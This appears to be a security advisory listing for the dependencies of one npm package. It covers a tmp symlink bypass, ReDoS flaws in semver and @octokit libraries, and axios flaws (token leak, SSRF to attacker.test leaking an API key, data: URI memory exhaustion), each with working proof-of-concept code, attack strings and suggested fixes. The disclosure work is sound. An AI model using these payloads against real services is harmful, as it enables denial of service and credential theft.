All vulnerabilities related to version 0.26.4 of the package
tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter
tmp@0.2.3 is vulnerable to an arbitrary temporary file / directory write via a symbolic link passed through the `dir` parameter.
According to the documentation, there are some conditions that must hold:
```
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
```
```
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
  absolute paths are fine as long as they point to a location under the system's default temporary directory.
  Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
  as tmp will not check the availability of the path, nor will it establish the requested path for you.
```
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because `_resolvePath` does not properly handle symbolic links when resolving paths:
```
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
  if (name.startsWith(tmpDir)) {
    return path.resolve(name);
  } else {
    return path.resolve(path.join(tmpDir, name));
  }
}
```
If the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it's possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:
```
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
  if (option === 'name') {
    // assert that name is not absolute and does not contain a path
    if (path.isAbsolute(name))
      throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
    // must not fail on valid .<name> or ..<name> or similar such constructs
    let basename = path.basename(name);
    if (basename === '..' || basename === '.' || basename !== name)
      throw new Error(`${option} option must not contain a path, found "${name}".`);
  }
  else { // if (option === 'dir' || option === 'template') {
    // assert that dir or template are relative to tmpDir
    if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
    }
    let resolvedPath = _resolvePath(name, tmpDir); //<---
    if (!resolvedPath.startsWith(tmpDir))
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
  }
}
```
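To see why the check passes, here is a worked trace (a sketch assuming `TMPDIR=/tmp`, a home directory of `/home/user`, and the symlink created in the PoC below):

```
const path = require('node:path');
const fs = require('node:fs');

// 'evil-dir' is not absolute, so _resolvePath joins it onto tmpDir:
const resolved = path.resolve(path.join('/tmp', 'evil-dir')); // '/tmp/evil-dir'
console.log(resolved.startsWith('/tmp')); // true -> _assertIsRelative passes

// ...but the symlink target lies outside tmpDir:
console.log(fs.realpathSync('/tmp/evil-dir')); // '/home/user/mydir1'
```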
The following PoC demonstrates that writing a tmp file to a folder outside the `tmpDir` is possible. Tested on a Linux machine.
Create a symlink inside the `tmpDir` that points to a directory outside of it:

```
mkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
```

Run the PoC (`main.js`, listed below):

```
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
```

The temporary file is created in `$HOME/mydir1` (outside the `tmpDir`):

```
ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
```
`main.js`:

```
// npm i tmp@0.2.3
const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir' });
console.log('File: ', tmpobj.name);

try {
  tmp.fileSync({ 'dir': 'mydir1' });
} catch (err) {
  console.log('test 1:', err.message);
}

try {
  tmp.fileSync({ 'dir': '/foo' });
} catch (err) {
  console.log('test 2:', err.message);
}

try {
  const fs = require('node:fs');
  const resolved = fs.realpathSync('/tmp/evil-dir');
  tmp.fileSync({ 'dir': resolved });
} catch (err) {
  console.log('test 3:', err.message);
}
```
A potential fix could be to call `fs.realpathSync` (or similar), which also resolves symbolic links:
```
function _resolvePath(name, tmpDir) {
  let resolvedPath;
  if (name.startsWith(tmpDir)) {
    resolvedPath = path.resolve(name);
  } else {
    resolvedPath = path.resolve(path.join(tmpDir, name));
  }
  return fs.realpathSync(resolvedPath);
}
```
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
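A minimal sketch of the vulnerable call path (the attack string is illustrative; real payloads target the whitespace handling in semver's range-parsing regexes):

```
// npm i semver@7.5.1 (a vulnerable 7.x version)
const semver = require('semver');

// Untrusted input reaching new Range is the attack surface:
const payload = '^1.2.3 ' + ' '.repeat(50000) + '!';
console.time('new Range');
try { new semver.Range(payload); } catch (e) { /* invalid range */ }
console.timeEnd('new Range'); // parse time grows superlinearly on vulnerable versions
```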
@octokit/request has a Regular Expression in fetchWrapper that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
The regular expression `/<([^>]+)>; rel="deprecation"/` used to match the `link` header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex's matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious `link` header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.
The vulnerability resides in the regular expression `/<([^>]+)>; rel="deprecation"/`, which is used to match the `link` header in HTTP responses. This regular expression captures content between angle brackets (`<>`) followed by `; rel="deprecation"`. However, the pattern is vulnerable to ReDoS (Regular Expression Denial of Service) attacks due to its susceptibility to catastrophic backtracking when processing malicious input.
An attacker can exploit this vulnerability by sending a specially crafted `link` header designed to trigger excessive backtracking. For example, the following headers:

```
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
```
The crafted `link` header consists of 100,000 consecutive `<` characters followed by a closing `>`. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant increase in CPU usage, which may lead to denial of service, making the server unresponsive or even causing it to crash under load.
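The effect can be reproduced with the regex alone (a standalone sketch; exact timings vary by hardware and engine):

```
// On vulnerable versions, matching this header burns many seconds of CPU time.
const header = "<".repeat(100000) + ">";
console.time("match");
// `[^>]+` consumes the run of '<' characters, then the literal `; rel="deprecation"`
// fails to follow, forcing the engine to backtrack and retry from every start position.
header.match(/<([^>]+)>; rel="deprecation"/);
console.timeEnd("match");
```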
The issue is present in the following code:

```
const matches = responseHeaders.link && responseHeaders.link.match(/<([^>]+)>; rel="deprecation"/);
```
In this scenario, the `link` header value triggers the regex to perform excessive backtracking, resulting in resource exhaustion and potentially causing the service to become unavailable. The PoC below intercepts `fetch` responses and injects such a header:
```
import { request } from "@octokit/request";

const originalFetch = globalThis.fetch;
globalThis.fetch = async (url, options) => {
  const response = await originalFetch(url, options);
  const fakeHeaders = new Headers(response.headers);
  fakeHeaders.set("link", "<".repeat(100000) + ">");
  fakeHeaders.set("deprecation", "true");
  return new Response(response.body, {
    status: response.status,
    statusText: response.statusText,
    headers: fakeHeaders
  });
};

request("GET /repos/octocat/hello-world")
  .then(response => {
    // console.log("[+] Response received:", response);
  })
  .catch(error => {
    // console.error("[-] Error:", error);
  });

// globalThis.fetch = originalFetch;
```
This is a Denial of Service (DoS) vulnerability caused by a ReDoS (Regular Expression Denial of Service) flaw. The vulnerability allows an attacker to craft a malicious `link` header that exploits the inefficient backtracking behavior of the regular expression used in the code.
The primary impact is the potential for server resource exhaustion, specifically high CPU usage, which can cause the server to become unresponsive or even crash when processing the malicious request. This affects the availability of the service, leading to downtime or degraded performance.
The vulnerability impacts any system that uses this specific regular expression to process `link` headers in HTTP responses. The attack requires only a crafted `link` header, making it a low-barrier attack that could be exploited by anyone.
@octokit/request-error has a Regular Expression in index that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the processing of HTTP request headers. By sending an authorization header containing an excessively long sequence of spaces followed by a newline and "@", an attacker can exploit inefficient regular expression processing, leading to excessive resource consumption. This can significantly degrade server performance or cause a denial-of-service (DoS) condition, impacting availability.
The issue occurs at line 52 of index.ts in the @octokit/request-error repository.
The vulnerability is caused by the use of an inefficient regular expression in the handling of the `authorization` header within the request processing logic:

```
authorization: options.request.headers.authorization.replace(
  / .*$/,
  " [REDACTED]"
)
```
The regular expression `/ .*$/` matches a space followed by any number of characters until the end of the line. This pattern is vulnerable to Regular Expression Denial of Service (ReDoS) when processing specially crafted input. Specifically, an attacker can send an `authorization` header containing a long sequence of spaces followed by a newline and "@", such as:

```
headers: {
  authorization: "" + " ".repeat(100000) + "\n@",
}
```
Due to the way JavaScript's regular expression engine backtracks while attempting to match the space followed by arbitrary characters, this input can cause excessive CPU usage, significantly slowing down or even freezing the server. This leads to a denial-of-service condition, impacting availability.
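As with the previous advisory, the slowdown can be demonstrated with the pattern alone (a standalone sketch; timings vary):

```
// Without the /m flag, `$` only matches at the very end of the string; `.`
// cannot cross the "\n", so every candidate match fails after long backtracking.
const header = " ".repeat(100000) + "\n@";
console.time("replace");
header.replace(/ .*$/, " [REDACTED]");
console.timeEnd("replace");
```

The full PoC below reaches the vulnerable `replace` through the `RequestError` constructor: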
```
import { RequestError } from "@octokit/request-error";

const error = new RequestError("Oops", 500, {
  request: {
    method: "POST",
    url: "https://api.github.com/foo",
    body: {
      bar: "baz",
    },
    headers: {
      authorization: "" + " ".repeat(100000) + "\n@",
    },
  },
  response: {
    status: 500,
    url: "https://api.github.com/foo",
    headers: {
      "x-github-request-id": "1:2:3:4",
    },
    data: {
      foo: "bar",
    },
  },
});
```
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to an inefficient regular expression (`/ .*$/`) used to sanitize the `authorization` header. An attacker can craft a malicious input that triggers excessive backtracking in the regex engine, leading to high CPU consumption and potential denial-of-service (DoS). Any system that passes untrusted `authorization` headers through this sanitization is at risk, especially those processing a large volume of authentication requests.
@octokit/plugin-paginate-rest has a Regular Expression in iterator that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
For the npm package `@octokit/plugin-paginate-rest`, when calling `octokit.paginate.iterator()`, a specially crafted `octokit` instance, particularly one with a malicious `link` parameter in the `headers` section of the `request`, can trigger a ReDoS attack.
The issue occurs at line 39 of iterator.ts in the @octokit/plugin-paginate-rest repository. The relevant code is as follows:

```
url = ((normalizedResponse.headers.link || "").match(
  /<([^>]+)>;\s*rel="next"/,
) || [])[1];
```
The regular expression `/<([^>]+)>;\s*rel="next"/` may lead to a potential backtracking vulnerability, resulting in a ReDoS (Regular Expression Denial of Service) attack. This could cause high CPU utilization and even service slowdowns or freezes when processing specially crafted `Link` headers.
```
import { Octokit } from "@octokit/core";
import { paginateRest } from "@octokit/plugin-paginate-rest";

const MyOctokit = Octokit.plugin(paginateRest);
const octokit = new MyOctokit({
  auth: "your-github-token",
});

// Intercept the request to inject a malicious 'link' header for ReDoS
octokit.hook.wrap("request", async (request, options) => {
  const maliciousLinkHeader = "" + "<".repeat(100000) + ">"; // attack string
  return {
    data: [],
    headers: {
      link: maliciousLinkHeader, // Inject malicious 'link' header
    },
  };
});

// Trigger the ReDoS attack by paginating through GitHub issues
(async () => {
  try {
    for await (const normalizedResponse of octokit.paginate.iterator(
      "GET /repos/{owner}/{repo}/issues",
      { owner: "DayShift", repo: "ReDos", per_page: 100 }
    )) {
      console.log({ normalizedResponse });
    }
  } catch (error) {
    console.error("Error encountered:", error);
  }
})();
```
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to excessive backtracking in the regex pattern `/<([^>]+)>;\s*rel="next"/`. When processing a specially crafted `Link` header, this regex can cause significant performance degradation, leading to high CPU utilization and potential service unresponsiveness. Affected are users of `@octokit/plugin-paginate-rest` who call `octokit.paginate.iterator()` and process untrusted or manipulated `Link` headers.
Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host, allowing attackers to view sensitive information.
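A minimal sketch of the leak (assuming a browser-like environment and a vulnerable axios version; the cookie value and URLs are illustrative):

```
// With axios <= 1.5.1, the XSRF-TOKEN cookie value is copied into the
// X-XSRF-TOKEN header for every request, regardless of the target origin.
import axios from "axios";

document.cookie = "XSRF-TOKEN=secret-csrf-token";
// The attacker-controlled host receives "X-XSRF-TOKEN: secret-csrf-token".
await axios.get("https://attacker.test/");
```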
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if `baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Consider the following code snippet:

```
import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF
```
In this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.
It is recommended that:
- When `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.
- Before sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.
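Until a fix ships, callers can apply the second check themselves; a minimal sketch (the helper name and base URL are ours, not axios API):

```
const BASE = "http://example.test/api/v1/users/";

// Resolve the user-supplied value against the base and refuse anything that
// escapes it (an absolute URL replaces the base entirely during resolution).
function safeUrl(userInput) {
  const resolved = new URL(userInput, BASE).href;
  if (!resolved.startsWith(BASE)) {
    throw new Error("refusing to request outside baseURL: " + resolved);
  }
  return resolved;
}

safeUrl("123");                   // ok: http://example.test/api/v1/users/123
safeUrl("http://attacker.test/"); // throws
```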
Follow the steps below to reproduce the issue:
```
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
```
Save the following script as `main.js` and run it:

```
import axios from "axios";

const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
```
```
$ node main.js
this is server2
```
Even though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.
Any service that sets a `baseURL` and does not validate path parameters is affected by this issue.
Axios is vulnerable to DoS attack through lack of data size check
When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.
The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When axios encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob. Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):
```
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;

  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }

  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });

  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
```
The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):
```
export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
```
Note that:
- The `data:` decoding path enforces neither `config.maxContentLength` nor `config.maxBodyLength`, which only apply to HTTP streams.
- A `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.
PoC:

```
const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;
  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });
  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});
```
Run with limited heap to force a crash:

```
node --max-old-space-size=100 poc.js
```

Since the Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

```
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
 1: 0x… node::Abort() …
…
```
Mini real-app PoC: a small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows `data:` URLs, for which axios ignores `maxContentLength` and `maxBodyLength` entirely and decodes the payload into memory on Node before streaming, enabling DoS.
```
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });

const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req, res) => res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */
app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;
  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before) / 1024 / 1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before) / 1024 / 1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
```
Run this app and send three POST requests:

```
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
  | tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null
```
Enforce size limits
For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.
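A minimal sketch of such a pre-decode check (the helper name and wiring are ours, not axios code):

```
// Base64 encodes 3 bytes per 4 characters, so the decoded size can be bounded
// before any allocation happens.
function assertDataUriWithinLimit(uri, maxContentLength) {
  const comma = uri.indexOf(',');
  const payloadLength = uri.length - comma - 1;             // Base64 characters
  const decodedBytes = Math.floor((payloadLength * 3) / 4); // upper bound on decoded size
  if (maxContentLength > -1 && decodedBytes > maxContentLength) {
    throw new Error('data: URI payload of ~' + decodedBytes + ' bytes exceeds maxContentLength');
  }
}
```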
Stream decoding
Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
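An illustrative sketch of chunked decoding (our own helper, not axios code):

```
// Slice the Base64 string at multiples of 4 characters so each chunk decodes
// independently, and abort once a byte budget is exceeded.
function* decodeBase64Chunks(b64, chunkChars = 64 * 1024, maxBytes = Infinity) {
  let produced = 0;
  for (let i = 0; i < b64.length; i += chunkChars) {
    const buf = Buffer.from(b64.slice(i, i + chunkChars), 'base64');
    produced += buf.length;
    if (produced > maxBytes) throw new Error('data: URI exceeds size budget');
    yield buf;
  }
}
```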